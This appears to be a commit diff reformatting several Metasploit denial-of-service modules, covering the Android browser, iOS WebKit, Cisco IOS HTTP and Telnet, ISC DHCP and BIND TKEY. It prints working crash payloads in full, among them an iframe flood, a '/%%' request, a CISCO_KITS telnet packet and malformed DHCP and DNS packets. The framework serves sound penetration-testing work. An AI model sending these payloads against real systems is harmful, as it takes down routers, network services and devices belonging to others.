kernelsmith
diff --git a/‎modules/auxiliary/dos/android/android_stock_browser_iframe.rb‎
Lines changed: 14 additions & 9 deletions b/‎modules/auxiliary/dos/android/android_stock_browser_iframe.rb‎
Lines changed: 14 additions & 9 deletions
diff --git a/‎modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb‎
Lines changed: 11 additions & 6 deletions b/‎modules/auxiliary/dos/apple_ios/webkit_backdrop_filter_blur.rb‎
Lines changed: 11 additions & 6 deletions
diff --git a/‎modules/auxiliary/dos/cisco/ios_http_percentpercent.rb‎
Lines changed: 26 additions & 20 deletions b/‎modules/auxiliary/dos/cisco/ios_http_percentpercent.rb‎
Lines changed: 26 additions & 20 deletions
diff --git a/‎modules/auxiliary/dos/cisco/ios_telnet_rocem.rb‎
Lines changed: 34 additions & 28 deletions b/‎modules/auxiliary/dos/cisco/ios_telnet_rocem.rb‎
Lines changed: 34 additions & 28 deletions
diff --git a/‎modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb‎
Lines changed: 26 additions & 23 deletions b/‎modules/auxiliary/dos/dhcp/isc_dhcpd_clientid.rb‎
Lines changed: 26 additions & 23 deletions
diff --git a/‎modules/auxiliary/dos/dns/bind_tkey.rb‎
Lines changed: 37 additions & 29 deletions b/‎modules/auxiliary/dos/dns/bind_tkey.rb‎
Lines changed: 37 additions & 29 deletions
@@ -10,24 +10,29 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'           => "Android Stock Browser Iframe DOS",
-        'Description'    => %q(
+        'Name' => 'Android Stock Browser Iframe DOS',
+        'Description' => %q{
           This module exploits a vulnerability in the native browser that comes with Android 4.0.3.
           If successful, the browser will crash after viewing the webpage.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         => [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Jean Pascal Pereira',  # Original exploit discovery
           'Jonathan Waggoner'     # Metasploit module
         ],
-        'References'     => [
+        'References' => [
           [ 'PACKETSTORM', '118539'],
           [ 'CVE', '2012-6301' ]
         ],
         'DisclosureDate' => '2012-12-01',
-        'Actions'        => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
+        'Actions' => [[ 'WebServer', { 'Description' => 'Serve exploit via web server' } ]],
         'PassiveActions' => [ 'WebServer' ],
-        'DefaultAction'  => 'WebServer'
+        'DefaultAction' => 'WebServer',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end
@@ -44,7 +49,7 @@ def setup
       for (var i = 0; i < 600; i++)
       {
         var m_frame = document.createElement("iframe");
-        m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(rand(16) + 1)}");
+        m_frame.setAttribute("src", "market://#{Rex::Text.rand_text_alpha(1..16)}");
         document.body.appendChild(m_frame);
       }
     </script>
 
@@ -10,21 +10,26 @@ def initialize(info = {})
     super(
       update_info(
         info,
-        'Name'           => "iOS Safari Denial of Service with CSS",
-        'Description'    => %q(
+        'Name' => 'iOS Safari Denial of Service with CSS',
+        'Description' => %q{
           This module exploits a vulnerability in WebKit on Apple iOS.
           If successful, the device will restart after viewing the webpage.
-        ),
-        'License'        => MSF_LICENSE,
-        'Author'         => [
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
           'Sabri Haddouche', # twitter.com/pwnsdx
         ],
-        'References'     => [
+        'References' => [
           ['URL', 'https://twitter.com/pwnsdx/status/1040944750973595649'],
           ['URL', 'http://web.archive.org/web/20220706175501/https://gist.github.com/pwnsdx/ce64de2760996a6c432f06d612e33aea'],
           ['URL', 'https://nbulischeck.github.io/apple-safari-crash'],
         ],
         'DisclosureDate' => '2018-09-15',
+        'Notes' => {
+          'Stability' => [CRASH_OS_RESTARTS],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
       )
     )
   end
 
@@ -8,37 +8,43 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Cisco IOS HTTP GET /%% Request Denial of Service',
-      'Description'    => %q{
-        This module triggers a Denial of Service condition in the Cisco IOS
-        HTTP server. By sending a GET request for "/%%", the device becomes
-        unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
-        tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
-      },
-      'Author' 		=> [ 'aushack' ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco IOS HTTP GET /%% Request Denial of Service',
+        'Description' => %q{
+          This module triggers a Denial of Service condition in the Cisco IOS
+          HTTP server. By sending a GET request for "/%%", the device becomes
+          unresponsive. IOS 11.1 -> 12.1 are reportedly vulnerable. This module
+          tested successfully against a Cisco 1600 Router IOS v11.2(18)P.
+        },
+        'Author' => [ 'aushack' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'BID', '1154'],
           [ 'CVE', '2000-0380'],
           [ 'OSVDB', '1302' ],
         ],
-      'DisclosureDate' => '2000-04-26'))
-
-    register_options(
-      [
-        Opt::RPORT(80),
-      ])
+        'DisclosureDate' => '2000-04-26',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
+    register_options([
+      Opt::RPORT(80),
+    ])
   end
 
   def run
     connect
 
-    print_status("Sending HTTP DoS packet")
+    print_status('Sending HTTP DoS packet')
 
-    sploit = "GET /%% HTTP/1.0"
+    sploit = 'GET /%% HTTP/1.0'
     sock.put(sploit + "\r\n")
 
     disconnect
 
@@ -8,44 +8,50 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Cisco IOS Telnet Denial of Service',
-      'Description'    => %q{
-        This module triggers a Denial of Service condition in the Cisco IOS
-        telnet service affecting multiple Cisco switches. Tested against Cisco
-        Catalyst 2960 and 3750.
-      },
-      'Author'      => [ 'Artem Kondratenko' ],
-      'License'     => MSF_LICENSE,
-      'References'  =>
-        [
+    super(
+      update_info(
+        info,
+        'Name' => 'Cisco IOS Telnet Denial of Service',
+        'Description' => %q{
+          This module triggers a Denial of Service condition in the Cisco IOS
+          telnet service affecting multiple Cisco switches. Tested against Cisco
+          Catalyst 2960 and 3750.
+        },
+        'Author' => [ 'Artem Kondratenko' ],
+        'License' => MSF_LICENSE,
+        'References' => [
           ['BID', '96960'],
           ['CVE', '2017-3881'],
           ['URL', 'https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20170317-cmp'],
           ['URL', 'https://artkond.com/2017/04/10/cisco-catalyst-remote-code-execution']
         ],
-      'DisclosureDate' => '2017-03-17'))
+        'DisclosureDate' => '2017-03-17',
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options([ Opt::RPORT(23) ])
   end
 
   def run
-    begin
-      connect
-      print_status "Connected to telnet service"
-      packet = sock.read(200)
-      if packet.nil?
-        print_error "Failed to get initial packet from telnet service."
-      else
-        print_status "Got initial packet from telnet service: " + packet.inspect
-      end
-      print_status "Sending Telnet DoS packet"
-      sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
-      disconnect
-    rescue ::Rex::ConnectionRefused
-      print_status "Unable to connect to #{rhost}:#{rport}."
-    rescue ::Errno::ECONNRESET
-      print_good "DoS packet successful. #{rhost} not responding."
+    connect
+    print_status 'Connected to telnet service'
+    packet = sock.read(200)
+    if packet.nil?
+      print_error 'Failed to get initial packet from telnet service.'
+    else
+      print_status 'Got initial packet from telnet service: ' + packet.inspect
     end
+    print_status 'Sending Telnet DoS packet'
+    sock.put("\xff\xfa\x24\x00\x03CISCO_KITS\x012:" + Rex::Text.rand_text_alpha(1000) + ":1:\xff\xf0")
+    disconnect
+  rescue ::Rex::ConnectionRefused
+    print_status "Unable to connect to #{rhost}:#{rport}."
+  rescue ::Errno::ECONNRESET
+    print_good "DoS packet successful. #{rhost} not responding."
   end
 end
@@ -9,58 +9,61 @@ class MetasploitModule < Msf::Auxiliary
 
   def initialize
     super(
-      'Name'          => 'ISC DHCP Zero Length ClientID Denial of Service Module',
-      'Description'   => %q{
+      'Name' => 'ISC DHCP Zero Length ClientID Denial of Service Module',
+      'Description' => %q{
           This module performs a Denial of Service Attack against the ISC DHCP server,
         versions 4.1 before 4.1.1-P1 and 4.0 before 4.0.2-P1. It sends out a DHCP Request
         message with a 0-length client_id option for an IP address on the appropriate range
         for the dhcp server. When ISC DHCP Server tries to hash this value it exits
         abnormally.
       },
-      'Author'        =>
-          [
-            'sid', # Original POC
-            'theLightCosine' # msf module
-          ],
-      'License'       => MSF_LICENSE,
-      'References'    =>
-        [
-          [ 'CVE', '2010-2156' ],
-          [ 'OSVDB', '65246'],
-          [ 'EDB', '14185']
-        ]
+      'Author' => [
+        'sid', # Original POC
+        'theLightCosine' # msf module
+      ],
+      'License' => MSF_LICENSE,
+      'References' => [
+        [ 'CVE', '2010-2156' ],
+        [ 'OSVDB', '65246'],
+        [ 'EDB', '14185']
+      ],
+      'Notes' => {
+        'Stability' => [CRASH_SERVICE_DOWN],
+        'SideEffects' => [],
+        'Reliability' => []
+      }
     )
     register_options(
       [
         OptAddress.new('RIP', [true, 'A valid IP to request from the server'])
       ]
     )
-    deregister_options('FILTER','PCAPFILE','SNAPLEN','TIMEOUT')
+    deregister_options('FILTER', 'PCAPFILE', 'SNAPLEN', 'TIMEOUT')
   end
 
   def run
     open_pcap
-    print_status("Creating DHCP Request with 0-length ClientID")
+    print_status('Creating DHCP Request with 0-length ClientID')
     p = PacketFu::UDPPacket.new
-    p.ip_daddr = "255.255.255.255"
+    p.ip_daddr = '255.255.255.255'
     p.udp_sport = 68
     p.udp_dport = 67
 
     # TODO: Get a DHCP parser into PacketFu
     chaddr = "\xaa\xaa\xaa\xaa\xaa\xaa"
     dhcp_payload = "\x63\x82\x53\x63\x35\x01\x03\x3d\x00\xff"
-    p.payload = dhcp_req(chaddr,dhcp_payload)
+    p.payload = dhcp_req(chaddr, dhcp_payload)
     p.recalc
-    print_status("Sending malformed DHCP request...")
+    print_status('Sending malformed DHCP request...')
     capture_sendto(p, '255.255.255.255')
     close_pcap
   end
 
-  def dhcp_req(chaddr,payload)
+  def dhcp_req(chaddr, payload)
     req = "\x00" * 236
-    req[0,3] = "\x01\x01\x06" # Boot request on Eth with hw len of 6
-    req[12,4] = Rex::Socket.addr_aton(datastore['RIP'])
-    req[28,6] = chaddr
+    req[0, 3] = "\x01\x01\x06" # Boot request on Eth with hw len of 6
+    req[12, 4] = Rex::Socket.addr_aton(datastore['RIP'])
+    req[28, 6] = chaddr
     req + payload
   end
 end
@@ -9,30 +9,38 @@ class MetasploitModule < Msf::Auxiliary
   include Msf::Auxiliary::Dos
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'BIND TKEY Query Denial of Service',
-      'Description'    => %q{
-        This module sends a malformed TKEY query, which exploits an
-        error in handling TKEY queries on affected BIND9 'named' DNS servers.
-        As a result, a vulnerable named server will exit with a REQUIRE
-        assertion failure. This condition can be exploited in versions of BIND
-        between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0
-        through 9.10.2-P2.
-      },
-      'Author'         => [
-        'Jonathan Foote',      # Original discoverer
-        'throwawayokejxqbbif', # PoC
-        'wvu'                  # Metasploit module
-      ],
-      'References'     => [
-        ['CVE', '2015-5477'],
-        ['URL', 'http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
-        ['URL', 'https://kb.isc.org/article/AA-01272']
-      ],
-      'DisclosureDate' => '2015-07-28',
-      'License'        => MSF_LICENSE,
-      'DefaultOptions' => {'ScannerRecvWindow' => 0}
-    ))
+    super(
+      update_info(
+        info,
+        'Name' => 'BIND TKEY Query Denial of Service',
+        'Description' => %q{
+          This module sends a malformed TKEY query, which exploits an
+          error in handling TKEY queries on affected BIND9 'named' DNS servers.
+          As a result, a vulnerable named server will exit with a REQUIRE
+          assertion failure. This condition can be exploited in versions of BIND
+          between BIND 9.1.0 through 9.8.x, 9.9.0 through 9.9.7-P1 and 9.10.0
+          through 9.10.2-P2.
+        },
+        'Author' => [
+          'Jonathan Foote',      # Original discoverer
+          'throwawayokejxqbbif', # PoC
+          'wvu'                  # Metasploit module
+        ],
+        'References' => [
+          ['CVE', '2015-5477'],
+          ['URL', 'http://web.archive.org/web/20190425014550/https://www.isc.org/blogs/cve-2015-5477-an-error-in-handling-tkey-queries-can-cause-named-to-exit-with-a-require-assertion-failure/'],
+          ['URL', 'https://kb.isc.org/article/AA-01272']
+        ],
+        'DisclosureDate' => '2015-07-28',
+        'License' => MSF_LICENSE,
+        'DefaultOptions' => { 'ScannerRecvWindow' => 0 },
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => []
+        }
+      )
+    )
 
     register_options([
       Opt::RPORT(53),
@@ -52,15 +60,15 @@ def scan_host(ip)
   end
 
   def payload
-    name = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
-    txt  = Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+    name = Rex::Text.rand_text_alphanumeric(1..42)
+    txt = Rex::Text.rand_text_alphanumeric(1..42)
 
     name_length = [name.length].pack('C')
-    txt_length  = [txt.length].pack('C')
+    txt_length = [txt.length].pack('C')
     data_length = [txt.length + 1].pack('n')
-    ttl         = [rand(2 ** 31 - 1) + 1].pack('N')
+    ttl = [rand(2**31 - 1) + 1].pack('N')
 
-    query  = "\x00\x00"  # Transaction ID: 0x0000
+    query = "\x00\x00" # Transaction ID: 0x0000
     query << "\x00\x00"  # Flags: 0x0000 Standard query
     query << "\x00\x01"  # Questions: 1
     query << "\x00\x00"  # Answer RRs: 0